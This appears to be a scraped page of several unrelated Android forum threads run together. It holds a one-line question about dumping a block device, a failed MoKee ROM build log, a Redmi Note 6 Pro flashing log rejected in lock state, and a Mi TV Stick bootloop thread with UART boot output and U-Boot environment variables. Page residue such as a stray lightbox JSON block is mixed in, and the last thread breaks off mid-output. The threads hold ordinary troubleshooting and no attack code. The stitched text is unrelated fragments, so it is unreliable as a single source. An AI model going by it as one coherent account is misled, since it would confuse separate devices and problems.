fp = fopen(blockDev, "r"); to make it write to /sdcard/boot.img?

Build Android error. Help me,plz!

Code:
FAILED: /home/jack/Mokee/O/out/target/common/docs/mokee-api-stubs-timestamp
/bin/bash -c "(mkdir -p /home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/mokee-api-stubs_intermediates/ ) && (rm -f /home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/mokee-api-stubs_intermediates/droiddoc-src-list ) && (touch /home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/mokee-api-stubs_intermediates/droiddoc-src-list ) && (echo -n 'mokee-sdk/sdk/src/java/mokee/alarmclock/ClockContract.java mokee-sdk/sdk/src/java/mokee/alarmclock/MoKeeAlarmClock.java mokee-sdk/sdk/src/java/mokee/app/CustomTile.java mokee-sdk/sdk/src/java/mokee/app/CustomTileListenerService.java mokee-sdk/sdk/src/java/mokee/app/MKContextConstants.java mokee-sdk/sdk/src/java/mokee/app/MKStatusBarManager.java mokee-sdk/sdk/src/java/mokee/app/MKTelephonyManager.java mokee-sdk/sdk/src/java/mokee/app/Profile.java mokee-sdk/sdk/src/java/mokee/app/ProfileGroup.java mokee-sdk/sdk/src/java/mokee/app/ProfileManager.java mokee-sdk/sdk/src/java/mokee/app/StatusBarPanelCustomTile.java mokee-sdk/sdk/src/java/mokee/content/Intent.java mokee-sdk/sdk/src/java/mokee/externalviews/ExternalView.java mokee-sdk/sdk/src/java/mokee/externalviews/ExternalViewProperties.java mokee-sdk/sdk/src/java/mokee/externalviews/ExternalViewProviderService.java mokee-sdk/sdk/src/java/mokee/hardware/DisplayMode.java mokee-sdk/sdk/src/java/mokee/hardware/HSIC.java mokee-sdk/sdk/src/java/mokee/hardware/LiveDisplayConfig.java mokee-sdk/sdk/src/java/mokee/hardware/LiveDisplayManager.java mokee-sdk/sdk/src/java/mokee/hardware/MKHardwareManager.java mokee-sdk/sdk/src/java/mokee/hardware/ThermalListenerCallback.java mokee-sdk/sdk/src/java/mokee/hardware/TouchscreenGesture.java mokee-sdk/sdk/src/java/mokee/media/AudioSessionInfo.java mokee-sdk/sdk/src/java/mokee/media/MKAudioManager.java mokee-sdk/sdk/src/java/mokee/media/MediaRecorder.java mokee-sdk/sdk/src/java/mokee/os/Build.java mokee-sdk/sdk/src/java/mokee/os/Concierge.java mokee-sdk/sdk/src/java/mokee/power/PerformanceManager.java mokee-sdk/sdk/src/java/mokee/power/PerformanceManagerInternal.java mokee-sdk/sdk/src/java/mokee/power/PerformanceProfile.java mokee-sdk/sdk/src/java/mokee/preference/ConstraintsHelper.java mokee-sdk/sdk/src/java/mokee/preference/GlobalSettingSwitchPreference.java mokee-sdk/sdk/src/java/mokee/preference/MKGlobalSettingSwitchPreference.java mokee-sdk/sdk/src/java/mokee/preference/MKSecureSettingListPreference.java mokee-sdk/sdk/src/java/mokee/preference/MKSecureSettingSwitchPreference.java mokee-sdk/sdk/src/java/mokee/preference/MKSystemSettingDropDownPreference.java mokee-sdk/sdk/src/java/mokee/preference/MKSystemSettingListPreference.java mokee-sdk/sdk/src/java/mokee/preference/MKSystemSettingSwitchPreference.java mokee-sdk/sdk/src/java/mokee/preference/RemotePreference.java mokee-sdk/sdk/src/java/mokee/preference/RemotePreferenceManager.java mokee-sdk/sdk/src/java/mokee/preference/RemotePreferenceUpdater.java mokee-sdk/sdk/src/java/mokee/preference/SecureSettingSwitchPreference.java mokee-sdk/sdk/src/java/mokee/preference/SelfRemovingDropDownPreference.java mokee-sdk/sdk/src/java/mokee/preference/SelfRemovingListPreference.java mokee-sdk/sdk/src/java/mokee/preference/SelfRemovingPreference.java mokee-sdk/sdk/src/java/mokee/preference/SelfRemovingSwitchPreference.java mokee-sdk/sdk/src/java/mokee/preference/SettingsHelper.java mokee-sdk/sdk/src/java/mokee/preference/SystemSettingSwitchPreference.java mokee-sdk/sdk/src/java/mokee/profiles/AirplaneModeSettings.java mokee-sdk/sdk/src/java/mokee/profiles/BrightnessSettings.java mokee-sdk/sdk/src/java/mokee/profiles/ConnectionSettings.java mokee-sdk/sdk/src/java/mokee/profiles/LockSettings.java mokee-sdk/sdk/src/java/mokee/profiles/RingModeSettings.java mokee-sdk/sdk/src/java/mokee/profiles/StreamSettings.java mokee-sdk/sdk/src/java/mokee/providers/DataUsageContract.java mokee-sdk/sdk/src/java/mokee/providers/MKSettings.java mokee-sdk/sdk/src/java/mokee/providers/WeatherContract.java mokee-sdk/sdk/src/java/mokee/util/ColorUtils.java mokee-sdk/sdk/src/java/mokee/util/palette/ColorCutQuantizer.java mokee-sdk/sdk/src/java/mokee/util/palette/ColorUtils.java mokee-sdk/sdk/src/java/mokee/util/palette/DefaultGenerator.java mokee-sdk/sdk/src/java/mokee/util/palette/Palette.java mokee-sdk/sdk/src/java/mokee/weather/MKWeatherManager.java mokee-sdk/sdk/src/java/mokee/weather/RequestInfo.java mokee-sdk/sdk/src/java/mokee/weather/WeatherInfo.java mokee-sdk/sdk/src/java/mokee/weather/WeatherLocation.java mokee-sdk/sdk/src/java/mokee/weather/util/WeatherUtils.java mokee-sdk/sdk/src/java/mokee/weatherservice/ServiceRequest.java mokee-sdk/sdk/src/java/mokee/weatherservice/ServiceRequestResult.java mokee-sdk/sdk/src/java/mokee/weatherservice/WeatherProviderService.java /home/jack/Mokee/O/out/target/common/obj/APPS/org.mokee.platform-res_intermediates/src/mokee/platform/R.java /home/jack/Mokee/O/out/target/common/obj/APPS/org.mokee.platform-res_intermediates/src/mokee/platform/Manifest.java /home/jack/Mokee/O/out/target/common/obj/APPS/org.mokee.platform-res_intermediates/src/org/mokee/platform/internal/R.java ' >> /home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/mokee-api-stubs_intermediates/droiddoc-src-list ) && (for d in /home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/mokee-api-stubs_intermediates/src /home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/org.mokee.platform.sdk_intermediates/src ; do find \$d -name '*.java' -and -not -name '.*' >> /home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/mokee-api-stubs_intermediates/droiddoc-src-list 2> /dev/null ; done ; true ) && (( javadoc -encoding UTF-8 \\@/home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/mokee-api-stubs_intermediates/droiddoc-src-list -J-Xmx1600m -J-XX:-OmitStackTraceInFastThrow -XDignore.symbol.file -quiet -doclet com.google.doclava.Doclava -docletpath /home/jack/Mokee/O/out/host/linux-x86/framework/jsilver.jar:/home/jack/Mokee/O/out/host/linux-x86/framework/doclava.jar -templatedir build/tools/droiddoc/templates-sdk -bootclasspath /home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/core-oj_intermediates/classes.jar:/home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/core-libart_intermediates/classes.jar -classpath /home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/core-libart_intermediates/classes.jar:/home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/core-oj_intermediates/classes.jar:/home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/ext_intermediates/classes.jar:/home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/framework_intermediates/classes.jar:/home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/org.mokee.platform.sdk_intermediates/classes.jar: -sourcepath sdk/src/java/mokee/alarmclock/ClockContract.java:sdk/src/java/mokee/alarmclock/MoKeeAlarmClock.java:sdk/src/java/mokee/app/CustomTile.java:sdk/src/java/mokee/app/CustomTileListenerService.java:sdk/src/java/mokee/app/MKContextConstants.java:sdk/src/java/mokee/app/MKStatusBarManager.java:sdk/src/java/mokee/app/MKTelephonyManager.java:sdk/src/java/mokee/app/Profile.java:sdk/src/java/mokee/app/ProfileGroup.java:sdk/src/java/mokee/app/ProfileManager.java:sdk/src/java/mokee/app/StatusBarPanelCustomTile.java:sdk/src/java/mokee/content/Intent.java:sdk/src/java/mokee/externalviews/ExternalView.java:sdk/src/java/mokee/externalviews/ExternalViewProperties.java:sdk/src/java/mokee/externalviews/ExternalViewProviderService.java:sdk/src/java/mokee/hardware/DisplayMode.java:sdk/src/java/mokee/hardware/HSIC.java:sdk/src/java/mokee/hardware/LiveDisplayConfig.java:sdk/src/java/mokee/hardware/LiveDisplayManager.java:sdk/src/java/mokee/hardware/MKHardwareManager.java:sdk/src/java/mokee/hardware/ThermalListenerCallback.java:sdk/src/java/mokee/hardware/TouchscreenGesture.java:sdk/src/java/mokee/media/AudioSessionInfo.java:sdk/src/java/mokee/media/MKAudioManager.java:sdk/src/java/mokee/media/MediaRecorder.java:sdk/src/java/mokee/os/Build.java:sdk/src/java/mokee/os/Concierge.java:sdk/src/java/mokee/power/PerformanceManager.java:sdk/src/java/mokee/power/PerformanceManagerInternal.java:sdk/src/java/mokee/power/PerformanceProfile.java:sdk/src/java/mokee/preference/ConstraintsHelper.java:sdk/src/java/mokee/preference/GlobalSettingSwitchPreference.java:sdk/src/java/mokee/preference/MKGlobalSettingSwitchPreference.java:sdk/src/java/mokee/preference/MKSecureSettingListPreference.java:sdk/src/java/mokee/preference/MKSecureSettingSwitchPreference.java:sdk/src/java/mokee/preference/MKSystemSettingDropDownPreference.java:sdk/src/java/mokee/preference/MKSystemSettingListPreference.java:sdk/src/java/mokee/preference/MKSystemSettingSwitchPreference.java:sdk/src/java/mokee/preference/RemotePreference.java:sdk/src/java/mokee/preference/RemotePreferenceManager.java:sdk/src/java/mokee/preference/RemotePreferenceUpdater.java:sdk/src/java/mokee/preference/SecureSettingSwitchPreference.java:sdk/src/java/mokee/preference/SelfRemovingDropDownPreference.java:sdk/src/java/mokee/preference/SelfRemovingListPreference.java:sdk/src/java/mokee/preference/SelfRemovingPreference.java:sdk/src/java/mokee/preference/SelfRemovingSwitchPreference.java:sdk/src/java/mokee/preference/SettingsHelper.java:sdk/src/java/mokee/preference/SystemSettingSwitchPreference.java:sdk/src/java/mokee/profiles/AirplaneModeSettings.java:sdk/src/java/mokee/profiles/BrightnessSettings.java:sdk/src/java/mokee/profiles/ConnectionSettings.java:sdk/src/java/mokee/profiles/LockSettings.java:sdk/src/java/mokee/profiles/RingModeSettings.java:sdk/src/java/mokee/profiles/StreamSettings.java:sdk/src/java/mokee/providers/DataUsageContract.java:sdk/src/java/mokee/providers/MKSettings.java:sdk/src/java/mokee/providers/WeatherContract.java:sdk/src/java/mokee/util/ColorUtils.java:sdk/src/java/mokee/util/palette/ColorCutQuantizer.java:sdk/src/java/mokee/util/palette/ColorUtils.java:sdk/src/java/mokee/util/palette/DefaultGenerator.java:sdk/src/java/mokee/util/palette/Palette.java:sdk/src/java/mokee/weather/MKWeatherManager.java:sdk/src/java/mokee/weather/RequestInfo.java:sdk/src/java/mokee/weather/WeatherInfo.java:sdk/src/java/mokee/weather/WeatherLocation.java:sdk/src/java/mokee/weather/util/WeatherUtils.java:sdk/src/java/mokee/weatherservice/ServiceRequest.java:sdk/src/java/mokee/weatherservice/ServiceRequestResult.java:sdk/src/java/mokee/weatherservice/WeatherProviderService.java:/home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/core-libart_intermediates/classes.jar:/home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/core-oj_intermediates/classes.jar:/home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/ext_intermediates/classes.jar:/home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/framework_intermediates/classes.jar:/home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/org.mokee.platform.sdk_intermediates/classes.jar: -d /home/jack/Mokee/O/out/target/common/docs/mokee-api-stubs -hdf page.build OPR3.170623.013-\$(cat /home/jack/Mokee/O/out/build_number.txt) -hdf page.now \"\$(date -d @\$(cat /home/jack/Mokee/O/out/build_date.txt) \"+%d %b %Y %k:%M\")\" -stubs /home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/mokee-sdk_stubs_current_intermediates/src -stubpackages mokee.alarmclock:mokee.app:mokee.content:mokee.externalviews:mokee.hardware:mokee.media:mokee.os:mokee.preference:mokee.profiles:mokee.providers:mokee.platform:mokee.power:mokee.util:mokee.weather:mokee.weatherservice -exclude org.mokee.platform.internal -api /home/jack/Mokee/O/out/target/common/obj/PACKAGING/mk_public_api.txt -removedApi /home/jack/Mokee/O/out/target/common/obj/PACKAGING/mk_removed.txt -nodocs && touch -f /home/jack/Mokee/O/out/target/common/docs/mokee-api-stubs-timestamp ) || (rm -rf /home/jack/Mokee/O/out/target/common/docs/mokee-api-stubs /home/jack/Mokee/O/out/target/common/obj/JAVA_LIBRARIES/mokee-api-stubs_intermediates/droiddoc-src-list; exit 45) )"
mokee-sdk/sdk/src/java/mokee/preference/ConstraintsHelper.java:27: error:package android.support.v7.preference does not exist
import android.support.v7.preference.Preference;
^
mokee-sdk/sdk/src/java/mokee/preference/ConstraintsHelper.java:28: error: package android.support.v7.preference does not exist
import android.support.v7.preference.PreferenceGroup;
^
mokee-sdk/sdk/src/java/mokee/preference/ConstraintsHelper.java:29: error: package android.support.v7.preference does not exist
import android.support.v7.preference.PreferenceManager;
^
mokee-sdk/sdk/src/java/mokee/preference/SelfRemovingDropDownPreference.java:28: error:
public class SelfRemovingDropDownPreference extends DropDownPreference {
^
mokee-sdk/sdk/src/java/mokee/preference/SelfRemovingDropDownPreference.java:48: error: cannot find symbol
public void onBindViewHolder(PreferenceViewHolder holder) {
^
mokee-sdk/sdk/src/java/mokee/preference/SelfRemovingPreference.java:53: error: cannot find symbol
public void onBindViewHolder(PreferenceViewHolder holder) {
^
symbol: class PreferenceViewHolder
location: class SelfRemovingPreference
javadoc: error - In doclet class
In com.google.doclava.Doclava, method start had thrown an exception java.lang.reflect.InvocationTargetException
java.lang.IllegalArgumentException: Unable to find IThermalListenerCallback.java. This is usually because doclava has been asked to generate stubs for a file that isn't present in the list of input source files but exists in the input classpath.
at com.google.doclava.Stubs.parseLicenseHeader(Stubs.java:494)
at com.google.doclava.Stubs.writeClassFile(Stubs.java:478)
at com.google.doclava.Stubs.writeClassFile(Stubs.java:465)
at com.google.doclava.Stubs.writeStubsAndApi(Stubs.java:193)
at com.google.doclava.Doclava.start(Doclava.java:511)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at com.sun.tools.javadoc.DocletInvoker.invoke(DocletInvoker.java:310)
at com.sun.tools.javadoc.DocletInvoker.start(DocletInvoker.java:189)
at com.sun.tools.javadoc.Start.parseAndExecute(Start.java:366)
at com.sun.tools.javadoc.Start.begin(Start.java:219)
at com.sun.tools.javadoc.Start.begin(Start.java:205)
at com.sun.tools.javadoc.Main.execute(Main.java:64)
at com.sun.tools.javadoc.Main.main(Main.java:54)
1 error
39 warning
ninja: build stopped: subcommand failed.
11:45:41 ninja failed with: exit status 1
build/core/main.mk:21: recipe for target 'run_soong_ui' failed
make: *** [run_soong_ui] Error 1

Post-factory reset problems

I performed a factory reset on my Redmi Note 6 Pro and it seems things went wrong as it now won't boot. When I turn it on, I get the Mi.com screen for a few seconds then nothing. I did some googling and decided to try a fastboot flash. This did not work with an error "Flash xbl error"
Here is the log:
MiFlash 2020.3.14.0
vboytest index:1
idproduct: 53261 idvendor: 6353
Thread id:10 Thread name:95c0959
image path:C:\Users\User\Desktop\tulip_global_images_V12.0.1.0.PEKMIXM_20201229.0000.00_9.0_global
env android path:"C:\Users\User\Desktop\MIUI_Flash\Source\ThirdParty\Google\Android"
script :C:\Users\User\Desktop\tulip_global_images_V12.0.1.0.PEKMIXM_20201229.0000.00_9.0_global\flash_all_lock.bat
Physical Memory Usage:1044480 Byte
start process id 2968 name cmd
info1:$fastboot -s devicename getvar product 2&1 | findstr /r /c:"^product: *tulip" || echo Missmatching image and device
info1roduct: tulip
info1:$fastboot -s devicename getvar product 2&1 | findstr /r /c:"^product: *tulip" || exit /B 1
info1roduct: tulip
info1:$set CURRENT_ANTI_VER=4
info1:$for /F "tokens=2 delims=: " %i in ('fastboot -s devicename getvar anti 2&1 | findstr /r /c:"anti:"') do (set version=%i )
info1:$(set version=4 )
info1:$if [4] EQU [] set version=0
info1:$if 4 GTR 4 (
info1:echo current device antirollback version is greater than this package
info1: exit /B 1
info1
info1:$fastboot -s devicename flash xbl C:\Users\User\Desktop\tulip_global_images_V12.0.1.0.PEKMIXM_20201229.0000.00_9.0_global\images\xbl.elf ||
info2:Sending 'xbl' (2504 KB) OKAY [ 0.078s]
info1:"Flash xbl error"
info2:Writing 'xbl' FAILED (remote: 'Flashing is not allowed in Lock State')
info2:fastboot: error: Command failed
begin FlashDone
error:"Flash xbl error"
process exit.
flashSuccess False
isFactory False CheckCPUID False
before:flashSuccess is False set IsUpdate:True set IsDone True
after:flashSuccess is False set IsUpdate:false set IsDone true
Click to expand...
Click to collapse
Can anyone assist? I see the "flashing is not allowed in lock state" message but my various googlings seem to suggest I shouldn't need to unlock? Perhaps I do (I did start down that path but got a bit stuck - will persevere if that is the issue).
Managed to get into Recovery mode on the device and that fixed it. No need to flash after all.

Mi Stick stuck on boot logo (bricked?)

Hello everybody.
A couple of years ago I bought a Mi Stick for my mother, to use connected to an old LED tv she had. She used just 3 o 4 times tops with a Netflix account my brother shared with her. The device was practically new. My brother stopped paying Netflix a couple of months ago so she stopped using the device altogether so I disconnected it. But yesterday she told me my brother started paying Netflix again and told me to connect the MiStick to her TV again. Surprisingly, the device is now stuck on the boot logo:
{
"lightbox_close": "Close",
"lightbox_next": "Next",
"lightbox_previous": "Previous",
"lightbox_error": "The requested content cannot be loaded. Please try again later.",
"lightbox_start_slideshow": "Start slideshow",
"lightbox_stop_slideshow": "Stop slideshow",
"lightbox_full_screen": "Full screen",
"lightbox_thumbnails": "Thumbnails",
"lightbox_download": "Download",
"lightbox_share": "Share",
"lightbox_zoom": "Zoom",
"lightbox_new_window": "New window",
"lightbox_toggle_sidebar": "Toggle sidebar"
}
I'm really angry because the device had very little use and especially because I live in third world ****hole: a new MiStick costs almost 4 times more now. It's not like I have couple of dollars getting dust on a drawer somewhere and I can go buy another one.
Anyway, I know it's possible to flash/unbrick a MiBox, I did it some time ago. Anybody knows if it's possible to the same with the Mi Stick??? I googled about it but I didn't find anything.
Thank you for your time.
hello, my Mi TV Stick MDZ-24-AA also unfortunately hangs all the time on the logo, checked on various cables and on a decent power supply
through the remote control (arrow + OK) does not want to enter the bootloader
I have purchased PL2303HX converter
According to the instructions from https://forum.xda-developers.com/t/help-pleas...-no-power-led-no-video.4452819/#post-87044521
and partially supported by Ruslan's film
With a backup downloaded from https://disk-yandex-ru.translate.goog/d/aL5Xo...en&_x_tr_hl=en&_x_tr_pto=wapp&_x_tr_hist=true
Using Putty and ADB
I went through the entire installation process
Unfortunately, my mi stick still hangs on the logo: / What could be the cause? Is my mi stick still salvageable?
kedzior.kedzior said:
I have purchased PL2303HX converter
Using Putty and ...
I went through the entire installation process
Unfortunately, my mi stick still hangs on the logo
Click to expand...
Click to collapse
With the PL2303HX connected to the uart while the device is booting (to a hung state), what is shown in the uart log while the device is trying to boot?
Are you able to get a prompt over the uart as shown in the video?
Functioner said:
With the PL2303HX connected to the uart while the device is booting (to a hung state), what is shown in the uart log while the device is trying to boot?
Are you able to get a prompt over the uart as shown in the video?
Click to expand...
Click to collapse
GXL:BL1:9ac50e:bb16dc;FEAT:BDFD71BC:0;POC:3;RCY:0;EMMC:0;READ:0;0.0;0.0;CHK:0;
TE: 138335
BL2 Built : 10:18:52, Sep 14 2020. gxl g9f162b4-dirty - [email protected]
set vcck to 1120 mv
set vddee to 1000 mv
id=3
DDR4 board
CPU clk: 1200MHz
DDR scramble enabled
DDR4 chl: Rank0+1 @ 1056MHz - FAIL
DDR4 chl: Rank0 @ 1056MHz
bist_test rank: 0 19 05 2e 28 16 3a 17 02 2d 2b 1d 3a 17 02 2c 2c 1c 3d 18 02 2f 27 16 38 706 - PASS
Rank0: 1024MB(auto)-2T-18
AddrBus test pass!
eMMC boot @ 0
sw8 s
emmc switch 3 ok
BL2: rpmb counter: 0x00000020
emmc switch 0 ok
Load fip header from eMMC, src: 0x0000c200, des: 0x01400000, size: 0x00004000, part: 0
aml log : R1024 check pass!
New fip structure!
Load bl30 from eMMC, src: 0x00010200, des: 0x01700000, size: 0x0000d600, part: 0
aml log : R1024 check pass!
Load bl31 from eMMC, src: 0x00020200, des: 0x01700000, size: 0x0002b400, part: 0
aml log : R1024 check pass!
Load bl32 from eMMC, src: 0x0004c200, des: 0x01700000, size: 0x0003e200, part: 0
aml log : R1024 check pass!
Load bl33 from eMMC, src: 0x0008c200, des: 0x01700000, size: 0x00080e00, part: 0
aml log : R1024 check pass!
NOTICE: BL3-1: v1.0(release):129a6bc
NOTICE: BL3-1: Built : 17:09:37, Apr 25 2019
[BL31]: GXL CPU setup!
NOTICE: BL3-1: GXL secure boot!
NOTICE: BL3-1: BL33 decompress pass
mpu_config_enable:system pre init ok
dmc sec lock
[Image: gxl_v1.1.3377-2941e55e3 2020-07-08 17:19:09 [email protected]]
OPS=0xb4
21 0d b4 00 6b a3 4a 05 e8 35 9e 81 38 16 4f b7
[0.733983 Inits done]
secure task start!
high task start!
low task start!
INFO: BL3-2: ATOS-V2.4-239-g48b8c37d #1 Wed Feb 5 09:34:09 UTC 2020 arm
INFO: BL3-2: Chip: GXL Rev: D (21 - B0:2)
INFO: BL3-2: crypto engine DMA
INFO: BL3-2: secure time TEE
INFO: BL3-2: CONFIG_DEVICE_SECURE 0xb200000e
U-Boot 2015.01-g2e3e77d-dirty (Nov 07 2020 - 00:20:15), Build: jenkins-aquaman-664
DRAM: 1 GiB
Relocation Offset is: 36e80000
gpio: pin gpiodv_24 (gpio 43) value is 1
register usb cfg[0][1] = 0000000037f4c4f8
[CANVAS]canvas init
MMC: aml_priv->desc_buf = 0x0000000033e80ab0
aml_priv->desc_buf = 0x0000000033e82df0
SDIO Port B: 0, SDIO Port C: 1
co-phase 0x2, tx-dly 0, clock 400000
co-phase 0x2, tx-dly 0, clock 400000
co-phase 0x2, tx-dly 0, clock 400000
emmc/sd response timeout, cmd8, status=0x1ff2800
emmc/sd response timeout, cmd55, status=0x1ff2800
co-phase 0x2, tx-dly 0, clock 400000
co-phase 0x2, tx-dly 0, clock 40000000
[mmc_startup] mmc refix success
init_part() 297: PART_TYPE_AML
[mmc_init] mmc init success
aml log : R1024 check pass!
start dts,buffer=0000000033e85640,dt_addr=0000000033e85640
get_partition_from_dts() 71: ret 0
parts: 17
00: logo 0000000000800000 1
01: recovery 0000000001800000 1
02: misc 0000000000800000 1
03: dtbo 0000000000800000 1
04: cri_data 0000000000800000 2
05: param 0000000001000000 2
06: boot 0000000001000000 1
set has_boot_slot = 0
07: rsv 0000000001000000 1
08: tee 0000000002000000 1
09: vendor 0000000006400000 1
10: odm 0000000001400000 1
11: metadata 0000000001000000 1
12: vbmeta 0000000000200000 1
13: system 000000005ac00000 1
14: product 0000000006a00000 1
15: cache 0000000010000000 2
16: data ffffffffffffffff 4
init_part() 297: PART_TYPE_AML
eMMC/TSD partition table have been checked OK!
crc32_s:0x1577dad == storage crc_pattern:0x1577dad!!!
crc32_s:0xee152b83 == storage crc_pattern:0xee152b83!!!
crc32_s:0x7fd3b243 == storage crc_pattern:0x7fd3b243!!!
mmc env offset: 0x17400000
In: serial
Out: serial
Err: serial
reboot_mode=cold_boot
[store]To run cmd[emmc dtb_read 0x1000000 0x40000]
_verify_dtb_checksum()-2755: calc 6955a20f, store 6955a20f
_verify_dtb_checksum()-2755: calc 6955a20f, store 6955a20f
dtb_read()-2972: total valid 2
update_old_dtb()-2953: do nothing
aml log : R1024 check pass!
vpu: clk_level in dts: 7
vpu: set clk: 666667000Hz, readback: 666666667Hz(0x300)
vpu: vpu_clk_gate_init_off finish
vpp: vpp_init
hpd_state=0
vpp: vpp_matrix_update: 2
cvbs performance type = 6, table = 0
cvbs_config_hdmipll_gxl
cvbs_set_vid2_clk
the HHI_VDAC_CNTL0 =b0001
the HHI_VDAC_CNTL0 =b0200
the HHI_VDAC_CNTL1 =0
the HHI_VDAC_CNTL1 =8
amlkey_init() enter!
[EFUSE_MSG]keynum is 4
[BL31]: tee size: 0
[BL31]: tee size: 0
[BL31]: tee size: 0
[BL31]: tee size: 0
[KM]Error:f[key_manage_query_size]L507:key[region] not programed yet
CONFIG_AVB2: avb2
Start read misc partition datas!
info->magic =
info->version_major = 1
info->version_minor = 0
info->slots[0].priority = 15
info->slots[0].tries_remaining = 7
info->slots[0].successful_boot = 0
info->slots[1].priority = 14
info->slots[1].tries_remaining = 7
info->slots[1].successful_boot = 0
info->crc32 = -1075449479
active slot = 0
wipe_data=successful
wipe_cache=successful
upgrade_step=2
reboot_mode:::: cold_boot
[OSD]load fb addr from dts:/meson-fb
[OSD]fb_addr for logo: 0x3f800000
[OSD]load fb addr from dts:/meson-fb
[OSD]fb_addr for logo: 0x3f800000
[OSD]VPP_OFIFO_SIZE:0xfff00fff
[CANVAS]addr=0x3f800000 width=5760, height=2160
[OSD]osd_hw.free_dst_data: 0,719,0,575
Command: bcb uboot-command
Start read misc partition datas!
BCB hasn't any datas,exit!
do_monitor_bt_cmdline
gpio: pin GPIOX_17 (gpio 17) value is 0
gpio: pin GPIOX_17 (gpio 17) value is 1
gpio: pin GPIOX_18 (gpio 18) value is 1
hw_config_start:state = 3
bt_cmdline: fw downloaded
no recovery mod!
gpio: pin GPIOX_8 (gpio 8) value is 1
Hit Enter or space or Ctrl+C key to stop autoboot -- : 0
CONFIG_SYSTEM_AS_ROOT: systemroot
system_mode: 1
CONFIG_AVB2: avb2
active_slot: normal avb2: 1
Err imgread(L328):Fmt unsupported!genFmt 0x0 != 0x3
InUsbBurn
[MSG]sof
Set Addr 4
Get DT cfg
Get DT cfg
Get DT cfg
set CFG
Get DT cfg
Get DT cfg
Get DT cfg
Get DT cfg
waitIdentifyTime(751) > timeout(750)
(Re)start USB...
USB0: USB3.0 XHCI init start
Register 2000140 NbrPorts 2
Starting the controller
USB XHCI 1.00
scanning bus 0 for devices... 1 USB Device(s) found
scanning usb for storage devices... 0 Storage Device(s) found
** Bad device usb 0 **
** Bad device usb 0 **
active_slot: normal
Err imgread(L328):Fmt unsupported!genFmt 0x0 != 0x3
gxl_aquaman_v1#
kedzior.kedzior said:
Err imgread(L328):Fmt unsupported!genFmt 0x0 != 0x3
Click to expand...
Click to collapse
The above error might be an issue.
at the prompt:
gxl_aquaman_v1#
type:
printenv
and post the output.
Functioner said:
The above error might be an issue.
at the prompt:
gxl_aquaman_v1#
type:
printenv
and post the output.
Click to expand...
Click to collapse
gxl_aquaman_v1#printenv
1080p60hz_deepcolor=444,12bit
480p60hz_deepcolor=rgb,8bit
EnableSelinux=permissive
active_slot=normal
avb2=1
baudrate=115200
bcb_cmd=get_avb_mode;get_valid_slot;
boardid=3
boot_part=boot
bootargs=init=/init console=ttyS0,115200 no_console_suspend earlycon=aml_uart,0xc81004c0 ramoops.pstore_en=1 ramoops.record_size=0x8000 ramoops.console_size=0x4000 ro rootwait skip_initramfs reboot_mode_android=normal androidboot.selinux=permissive logo=osd1,loaded,0x3d800000,576cvbs maxcpus=4 vout=576cvbs,enable hdmimode=1080p60hz frac_rate_policy=1 cvbsmode=576cvbs hdmitx=,444,12bit cvbsdrv=0 androidboot.firstboot=0 jtag=apao androidboot.veritymode=enforcing androidboot.hardware=amlogic androidboot.btmacaddr=00:00:00:00:00:00 androidboot.wifimac=00:00:00:00:00:00 androidboot.wificountrycode=US androidboot.bootloader= androidboot.serialno=26919800002433906 androidboot.boardid=3 androidboot.region=none androidboot.reboot_mode=cold_boot page_trace=on androidboot.rpmb_state=0 aml_dt= recovery_part={recovery_part} recovery_offset={recovery_offset} aml_dt= recovery_part={recovery_part} recovery_offset={recovery_offset}
bootcmd=run storeboot
bootdelay=1
bootup_offset=0x1133b50
bootup_size=0x5eec7a
btmac=00:00:00:00:00:00
cmdline_keys=keyman init 0x1234; setkeys;
colorattribute=444,12bit
cvbs_drv=0
cvbsmode=576cvbs
display_bpp=24
display_color_bg=0
display_color_fg=0xffff
display_color_index=24
display_height=576
display_layer=osd1
display_width=720
dtb_mem_addr=0x1000000
factory_reset_poweroff_protect=echo wipe_data=${wipe_data}; echo wipe_cache=${wipe_cache};if test ${wipe_data} = failed; then run init_display; run storeargs;if usb start 0; then run recovery_from_udisk;fi;run recovery_from_flash;fi; if test ${wipe_cache} = failed; then run init_display; run storeargs;if usb start 0; then run recovery_from_udisk;fi;run recovery_from_flash;fi;
fb_addr=0x3d800000
fb_height=1080
fb_width=1920
fdt_high=0x20000000
firstboot=0
frac_rate_policy=1
fs_type=ro rootwait skip_initramfs
hdmimode=1080p60hz
identifyWaitTime=750
init_display=get_rebootmode;echo reboot_mode:::: ${reboot_mode};if test ${reboot_mode} = quiescent; then setenv reboot_mode_android quiescent;run storeargs;setenv bootargs ${bootargs} androidboot.quiescent=1;osd open;osd clear;else if test ${reboot_mode} = recovery_quiescent; then setenv reboot_mode_android quiescent;run storeargs;setenv bootargs ${bootargs} androidboot.quiescent=1;osd open;osd clear;else setenv reboot_mode_android normal;run storeargs;osd open;osd clear;imgread pic logo bootup $loadaddr;bmp display $bootup_offset;bmp scale; fi;fi;
initargs=init=/init console=ttyS0,115200 no_console_suspend earlycon=aml_uart,0xc81004c0 ramoops.pstore_en=1 ramoops.record_size=0x8000 ramoops.console_size=0x4000
jtag=apao
loadaddr=1080000
lock=10001000
maxcpus=4
